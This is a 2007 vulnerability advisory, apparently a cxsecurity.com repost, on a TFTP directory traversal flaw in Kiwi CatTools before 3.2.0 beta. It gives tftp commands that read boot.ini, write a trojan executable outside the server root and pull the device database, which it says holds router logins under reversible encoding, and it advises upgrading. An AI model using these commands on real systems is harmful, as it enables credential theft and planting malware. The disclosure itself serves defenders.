Bug: TFTP directory traversal in Kiwi CatTools (WLB-2007020040 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: TFTP directory traversal in Kiwi CatTools
 Credit: Nicob
 Date: 2007.02.14
 CWE: N/A
 CVE: CVE-2007-0889 (Show details)
CVE-2007-0888 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

TFTP directory traversal in Kiwi CatTools

Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Product :
=========

http://www.kiwisyslog.com/cattools-info.php :

"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."

A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.

Vunerability :
==============

TFTP directory traversal :

tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe

Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb".

Solution :
==========

Upgrade to version 3.2.0 beta or newer.

Nicob

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com